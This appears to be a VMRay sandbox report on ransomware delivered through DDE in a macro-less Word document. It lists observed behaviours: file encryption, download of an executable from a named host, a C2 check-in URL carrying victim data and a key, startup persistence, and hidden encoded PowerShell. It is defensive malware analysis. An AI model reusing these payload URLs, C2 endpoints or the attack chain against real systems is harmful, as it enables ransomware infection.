DDE Ransomware in a Macro-less Word document
| VTI by Category
Try VMRay Analyzer
|
VTI Score
100 / 100
|
|
| VTI Database Version | 2.6 |
| VTI Rule Match Count | 27 |
| VTI Rule Type | Documents |
|
File System |
|
|
|
Modify content of user files
|
|
|
Modify the content of multiple user files. This is an indicator for an encryption attempt.
|
||
|
|
Create many files
|
|
|
Create above average number of files.
|
||
|
|
Handle with malicious files
|
|
|
File "c:\users\kft6utqw\appdata\roaming\nvss.exe" is a known malicious file.
|
||
|
|
Network |
|
|
|
Download data
|
|
|
URL "w-szczecin.pl/img2/s50.exe".
|
||
|
URL "beer-ranking.pl/gen/".
|
||
|
URL "beer-ranking.pl/login/post.php?IP=87.142.159.51&ID=0b75c6dd-d172-492e-b7be-2c05de30e808&Data=17-10-2017%2001:10:26&Haslo=46sDISwJJE10uqPP7rx!K_*@KX(YL2yASBN@3SDx6)7!_HL7IR23RZY!FUT1H2@9*H40@r71qZWq_r7ISTutC2_RHSDYFxRCOG!JI3tIL0IL1A4D38H)UGQ!93Ty@wJIMF14r5xNOO8AZXNLO4Ktu@_(YTwRZO@u4W85K_D9Owtx2QRBF*EJ7DGO6LqP@@UYQNN!M15@68qSIS3YOrqFFH4w35UYZzFAW3urN9*E1*6tOT1(U2D9tq)65TNO23ZIQ3K)XGCIDsL2XxZB9!u**t32XBBJ(92OXxMDNZU02".
|
||
|
URL "beer-ranking.pl/save.txt".
|
||
|
|
Perform DNS request
|
|
|
Resolve host name "w-szczecin.pl".
|
||
|
Resolve host name "v4.ident.me".
|
||
|
Resolve host name "beer-ranking.pl".
|
||
|
|
Connect to remote host
|
|
|
Outgoing TCP connection to host "91.231.140.161:80".
|
||
|
Outgoing TCP connection to host "176.58.123.25:443".
|
||
|
Outgoing TCP connection to host "82.221.129.19:80".
|
||
|
|
Connect to HTTP server
|
|
|
URL "w-szczecin.pl/img2/s50.exe".
|
||
|
URL "beer-ranking.pl/gen/".
|
||
|
URL "beer-ranking.pl/login/post.php?IP=87.142.159.51&ID=0b75c6dd-d172-492e-b7be-2c05de30e808&Data=17-10-2017%2001:10:26&Haslo=46sDISwJJE10uqPP7rx!K_*@KX(YL2yASBN@3SDx6)7!_HL7IR23RZY!FUT1H2@9*H40@r71qZWq_r7ISTutC2_RHSDYFxRCOG!JI3tIL0IL1A4D38H)UGQ!93Ty@wJIMF14r5xNOO8AZXNLO4Ktu@_(YTwRZO@u4W85K_D9Owtx2QRBF*EJ7DGO6LqP@@UYQNN!M15@68qSIS3YOrqFFH4w35UYZzFAW3urN9*E1*6tOT1(U2D9tq)65TNO23ZIQ3K)XGCIDsL2XxZB9!u**t32XBBJ(92OXxMDNZU02".
|
||
|
URL "beer-ranking.pl/save.txt".
|
||
|
|
PE |
|
|
|
Execute dropped PE file
|
|
|
Execute dropped file "c:\users\kft6utqw\appdata\roaming\nvss.exe".
|
||
|
|
Drop PE file
|
|
|
Drop file "c:\users\kft6utqw\appdata\roaming\nvss.exe".
|
||
|
|
Persistence |
|
|
|
Install system startup script or application
|
|
|
Add "C:\Users\kFT6uTQW\AppData\Roaming\nvss.exe" to windows startup via registry.
|
||
|
Add "c:\users\kft6utqw\appdata\roaming\microsoft\windows\start menu\programs\startup" to windows startup folder.
|
||
|
|
Process |
|
|
|
Create process
|
|
|
Create process "C:\Windows\system32\cmd.exe".
|
||
|
Create process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe".
|
||
|
Create process ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -noprofile -windowstyle minimized -command".
|
||
|
Create process "C:\Users\kFT6uTQW\AppData\Roaming\nvss.exe".
|
||
|
Create process "CMD.exe".
|
||
|
Create process ""C:\Users\kFT6uTQW\AppData\Roaminghhfhqi2h.wln.bat"".
|
||
|
Create process "C:\Windows\system32\taskkill.exe".
|
||
|
|
Execute encoded PowerShell script
|
|
|
Execute encoded PowerShell script to possibly hide malicious payload.
|
||
|
|
Create system object
|
|
|
Create mutex with name "Local\!PrivacIE!SharedMemory!Mutex".
|
||
|
Create mutex with name "Global\.net clr networking".
|
||
| - | Anti Analysis | |
| - | Browser | |
| - | Device | |
| - | OS | |
| - | Hide Tracks | |
| - | Information Stealing | |
| - | Injection | |
| - | Kernel | |
| - | Masquerade | |
| - | User | |
| - | VBA Macro | |
| - | YARA | |
